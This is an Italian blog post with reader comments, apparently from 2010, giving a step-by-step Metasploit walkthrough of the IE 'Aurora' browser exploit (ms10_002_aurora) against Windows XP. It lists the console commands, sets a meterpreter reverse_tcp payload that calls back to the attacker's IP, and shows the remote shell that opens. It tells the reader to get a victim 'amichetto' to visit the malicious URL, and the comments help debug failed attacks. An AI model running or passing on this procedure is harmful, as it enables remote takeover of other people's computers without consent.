Non pubblico subito questi exploit, per dare tempo a tutti gli utenti di aggiornare il loro windows per evitare che qualcuno faccia casini in giro per il web a caso :)
Comunque sia, questo exploit è uscito il diciamo il 20 gennaio più o meno.
E’ stato testato da me su internet explorer 6, 7e 8 su windows XP SP3 e funziona perfettamente purtroppo per gli utenti windows.
Sfruttando questo exploit, potremo prendere il controllo della macchina da remoto con i privilegi dell’utente che sta navigando su internet.
Quindi a differenza di quest’altro exploit:
[Virtual DOS]Exploit privilege escalation windows 2000/XP/VISTA/7/SERVER
non avremo i privilegi kernel :( ma vabbè saremo amministratori nella maggior parte dei casi.
Ma vediamo come sfruttare questo exploit con metasploit : )
Io testerò questo exploit da ubuntu verso il mio windows xp sp3 con IE 6 in macchina virtuale.
Cominciamo :)
La prima cosa da fare, è aprire metasploit in console :)
Se non hai installato metasploit, puoi trovare la guida su come farlo qui:
Come installare Metasploit Framework su Ubuntu (e derivati)
Una volta installato, oppure se l’abbiamo già, la prima cosa da fare, è aggiornare gli exploit per avere quello che sfrutteremo, quindi digitiamo:
svn update
Poi apriamolo:
sudo ./msfconsole
Bene ora carichiamo l’exploit : )
Quindi sulla console digitiamo:
use exploit/windows/browser/ms10_002_aurora
poi:
set PAYLOAD windows/meterpreter/reverse_tcp
poi:
set LHOST NOSTRO IP (lo possiamo vedere digitando: ifconfig )
poi:
set URIPATH /
e infine lanciamo l’exploit digitando:
exploit
A questo punto avremo un output simile a questo:
[*] Exploit running as background job.
[*] Started reverse handler on port 4444
[*] Local IP: http//NOSTRO_IP:8080/
[*] Server started.
msf exploit(ie_aurora) >
A questo punto quindi dovremo far visitare al nostro “amichetto” questo indirizzo:
http//NOSTRO_IP:8080/
Una volta che il nostro amichetto visiterà quell’indirizzo, avremo un output simile a questo:
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.151:4444 -> 192.168.0.166:1514)
bene ora digitiamo:
sessions -i 1
Ora per aprire la shell digitiamo:
shell
avremo questo output:
Process 892 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Administrator\Desktop>
Altri:
- [guida]Oday-Exploit Adobe Reader: Hack di Windows con metasploit
- IE 6/7 EXPLOIT XML Remote Code Execution with METASPLOIT
- KiTrap0D Virtual-DOS oday per metasploit :)
- [CVE-2010-2568]Metasploit:windows Oday Remote Code Exuction
- [Samba EXPLOIT]Symlink Traversal (guida metasploit)
pixar scrive:
14 maggio 2010 alle 10:15
Ciao, complimenti per il sito, è il migliore!!!
Volevo chiederti una cosa, quando uso metasploit anche con quello descritto sopra, mi rimane sempre a questo punto:
"[*] Sending stage (723456 bytes)"e non fa niente, non completa l’invio, anche ricaricando la pagina sul pc vittima mi scrive un altro:
"[*] Sending stage (723456 bytes)"ma poi niente!
Aspetto qualche consiglio,
grazie mille
clshack scrive:
14 maggio 2010 alle 12:44
@pixar:
Questo “Sending”, vuol dire che l’exploit è stato inviato, cioè è stata fatta visualizzare alla vittima la pagina HTML contenente l’exploit.
Se si ferma qui, vuol dire che il borwser della vittima non è vulnerabile.
Ciao grazie ;)
pixar scrive:
14 maggio 2010 alle 15:29
ah ok, grazie mille per la risposta!!! continuate cosi, vi seguirò sempre!! Siete grandi!